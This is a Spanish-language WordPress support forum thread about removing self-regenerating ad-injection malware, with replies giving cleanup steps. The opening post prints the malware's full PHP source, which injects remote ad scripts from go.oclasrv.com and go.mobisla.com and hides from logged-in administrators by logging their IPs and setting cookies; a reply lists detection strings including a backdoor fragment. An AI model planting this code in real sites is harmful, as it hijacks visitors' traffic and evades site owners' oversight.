Soporte » Seguridad » Como Eliminar malware » go.oclasrv.com» por completo

  • Resuelto ajcobo71

    (@ajcobo71)


    Saludos.
    El enlace en referencia es un sitio de pruebas y producción.

    Quiero decirles que llevo un par de meses luchando contra este Adware Malware, virus o como quieran llamarle.
    Se trata de un codgio que se auto regenera mediante 2 archivos .php, este es el sript.

    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>

    Ahora bien sabemos que la vulnerabilidad pudo ser detecta en algun plugin o falsa actualización descargada e instalada en e sitio, pero lo mas cumbre del caso es que todos las web alojadas fueron infectadas.

    Este adware malware o como se le llame es un ladron de trafico, y mientras estas logueado como administrador nunca va a hacerce notar, una vez cierras la sesion y limpias la cache del navegador comienza a trabajar en tu web en cada click de enlace redirige a otros sitios sin relevancia ( porno, casinos, software basura, apuestas y pare de contar)

    Donde se aloja? hasta ahora lo he detecta en la carpeta wp-include y son dos archivos php. wp-feed.php y wp-temp.php, estos archivos por mas que se borran vuelven a regenerarce, al escanear el sitio con Wordfence el los elimina y los pocos minutos estan regenerados nuevamente infectando el sitio.

    Aqui les dejo el codigo de ambos.
    wp-temp.php

    ini_set('display_errors', 0);
    error_reporting(0);
    $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
    
    if ( ! function_exists( 'slider_option' ) ) {  
    
    function slider_option($content){ 
    if(is_single())
    {
    
    $con = '
    ';
    
    $con2 = '
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script>
    
    ';
    
    $content=$content.$con2;
    }
    return $content;
    } 
    
    function slider_option_footer(){ 
    if(!is_single())
    {
    
    $con2 = '
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script>
    
    ';
    
    echo $con2;
    }
    } 
    
    function setting_my_first_cookie() {
      setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
      }
    
    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }
    
    if( current_user_can('edit_others_pages'))
    {
    
    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }
    
    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
    
    }
    
    }
    
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
      if (strpos($ref,$source)!==false) {
        setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    	$sevisitor=true;
      }
    }
    
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    
    }
    
    }
    
    } 
    
    }

    Y el archivo wp-tem.php solo esta escrita la ip desde donde conecto a mi sitios wordpress.

    Como bien lo he mencionado, he hecho todo lo recomendado, nuevas instalaciones de wp, eliminación de y re instalación de plugin, he saneado según lo remendado en este foro de soporte… y nada!! ha Cambie de host, y los problemas continúan.

    Si alguno de vosotros habéis tenido este malware y lo ha solucionado, mucho le sabría agradecer, ya tengo muchos problemas tratando de recuperar el sitio y algunos de clientes y esto me tiene muy agotado.

    Agradeciendo su atención y colaboraciones al caso.

    Quedo atento de vuestros comentarios y agradeciendo la ayuda que me puedan prestar en este caso.

    Un saludo.

    La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 10 respuestas - 16 de 25 (de 25 total)
  • xalupeao

    (@xalupeao)

    Recuerda que debes desactivar el cron de WordPress.

    edita tu wp-config.php y agrega la linea para deshabilitar el cron.

    define('DISABLE_WP_CRON', 'true');

    luego borra el archivo wp-includes/wp-feed.php y wp-includes/wp-tmp.php

    luego debes ir a todos los functions.php de tus themes y borrar todo el código inyectado.

    wp-content/themes/xxxxx/functions.php son las primera 184 lineas más o menos.

    Ojo debes seguir al pie de la letra, ya que si no se deshabilitar el cron, se te infectara infinitas veces.

    Saludos.

    • Esta respuesta fue modificada hace 3 meses, 3 semanas por  Fernando Tellado. Razón: Etiquetado correcto del código
    posicionamientowebc

    (@posicionamientowebc)

    Tuve este virus en mi hosting con mas de 50 sitios de clientes y estaba como loco buscando la solución, por que borraba y al momento me seguía saliendo.
    Agradezco a @carceron que es todo un crack y pude limpiar los sitios efectivamente, ya que me habían pausado las campañas en google ads por este «software malicioso».
    Nuevamente gracias por las respuestas y ayudas en este foro

    inerciaweb

    (@inerciaweb)

    En este video muestra como eliminar por completo el malware rogueads.unwanted_ads https://www.youtube.com/watch?v=m1IX1x9WpNc

    -EO

    (@eo-2)

    Queremos Agradecer a todos los aportaron su ayuda para a resolver este problema.

    Lo que se nos presentó como un grave problema, finalmente se pudo resolver de forma sencilla.

    Salu2.

    Moderador almendron

    (@almendron)

    Estaría bien que indicaras cuál ha sido la forma sencilla para resolver el problema. Podría ayudar a otras personas.

    -EO

    (@eo-2)

    …por supuesto.

    En en la carpeta wp-includes borramos los siguientes archivos:

    wp-tmp.php
    wp-vcd.php

    wp.feed.php no se había generado en nuestro caso.

    En la carpeta de la plantilla/tema activo se restauró por la original el archivo functions.php ya que no hacemos modificaciones ahí. Si utilizas un «Child Theme» debes comprobar si está infectado.

    IMPORTANTE: Al principio no caímos pero, al comprobar los temas por defecto de WordPress, pudimos ver que también tenían infectado el archivo functions.php por lo que fueron reemplazados por el original. Aunque nunca se hayan activado estaban infectados.

    Volvimos a escanear con el plugin «Anti-Malware Security and Brute-Force Firewall» así como el servicio en línea de Securi y no detectaron nada.

    Para quedarnos aún más tranquilos descargamos una copia comprimida de todo el contenido del sitio, lo descomprimimos en un equipo y buscamos las siguientes cadenas con la aplicaion gratuita EasyFind

    La configuración de búsqueda fue: File Contens, Phrase, Ignore Case, Package Contens, Invisible Files & Contents

    Los términos de búsqueda fueron:

    go.oclasrv.com
    
    basepush.com

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password']

    …y nos quedamos más tranquilos cuando ninguno de los tres fue encontrado.

    Confiamos en que ayude.

    Salu2.

    • Esta respuesta fue modificada hace 8 meses por  -EO. Razón: errata
    • Esta respuesta fue modificada hace 3 meses, 3 semanas por  Fernando Tellado.
    Moderador almendron

    (@almendron)

    Gracias por la info.

    Excelente solución la de «carceron (@carceron)» Me funciono perfectamente. Muchas gracias!!!!! Llevaba horas intentando sacar esta infección en mi sitio web.

    Eres un dios @carceron sin tu inestimable ayuda, estaria perdido. tu solucion me valio, pude rescatar instalaciones importantes de mis clientes. muchisimas gracias… dberia habar un boton «donar» 😀

    Hola chicos,

    Tuve exactamente el mismo caso y aquí cuento como lo solucioné por si alguien se encuentra en la misma situación:

    https://www.metelidrissi.com/eliminar-hackeo-wordpress/

    Espero les sea de ayuda.

    Saludos

Viendo 10 respuestas - 16 de 25 (de 25 total)
  • Debes estar registrado para responder a este debate.